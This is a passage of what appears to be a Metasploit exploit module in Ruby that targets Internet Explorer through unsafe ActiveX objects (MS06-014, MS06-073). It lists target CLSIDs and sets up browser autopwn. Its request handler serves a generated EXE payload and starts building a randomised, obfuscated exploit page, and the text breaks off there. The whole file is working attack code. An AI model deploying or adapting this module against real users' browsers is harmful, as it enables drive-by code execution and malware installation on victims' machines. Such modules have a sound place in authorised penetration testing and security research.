## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, # In badly misconfigured situations, IE7 and 8 could be vulnerable to # this, but by default they throw an ugly popup that stops all script # execution until the user deals with it and aborts everything if they # click "no". Not worth the risk of being unable to try more recent # exploits. Make sure service packs on top of 6.0 are considered less # than the max by setting to 6.1 (which doesn't really exist). :ua_maxver => "6.1", :javascript => true, :os_name => OperatingSystems::WINDOWS, :method => [ 'CreateObject', 'GetObject' ], :classid => [ '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', ], #:rank => ExcellentRanking # reliable exe writer }) def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Description' => %q{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'References' => [ # MDAC [ 'MSB', 'MS06-014' ], [ 'CVE', '2006-0003' ], [ 'OSVDB', '24517' ], # WMI Object Broker [ 'MSB', 'MS06-073' ], [ 'CVE', '2006-4704' ], [ 'OSVDB', '30155' ], ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # Patched [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], # Found in mpack [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], # Patched [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], # # The controls below can launch the "installing component" dialogs... # # Not marked as safe [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 11 2006')) end def on_request_uri(cli, request) if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # Build out the HTML response page var_html = rand_text_alpha(rand(30)+2) var_func_exploit = rand_text_alpha(rand(30)+2); var_func_go = rand_text_alpha(rand(30)+2); var_func_createo = rand_text_alpha(rand(30)+2); var_exe_name = rand_text_alpha(rand(30)+2); var_objects = '' # Build the object list based on target selection if (target.name == 'Automatic') targets.each do |t| next if not t['CLSID'] var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end else var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end content = %Q^